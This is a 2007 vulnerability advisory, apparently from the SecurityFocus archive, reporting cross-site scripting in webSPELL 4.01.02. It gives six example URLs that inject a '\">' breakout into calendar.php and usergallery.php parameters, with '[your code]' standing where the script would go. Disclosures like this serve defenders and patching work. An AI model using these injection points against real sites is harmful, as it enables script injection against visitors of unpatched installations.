webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability Dec 08 2007 10:53PM
brainheadbrainhead gmx de
###################

Autor: Brainhead

Type: XSS

Version: 4.01.02

Files: usergallery.php, calendar.php

Magic Quotes :off

###################

Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus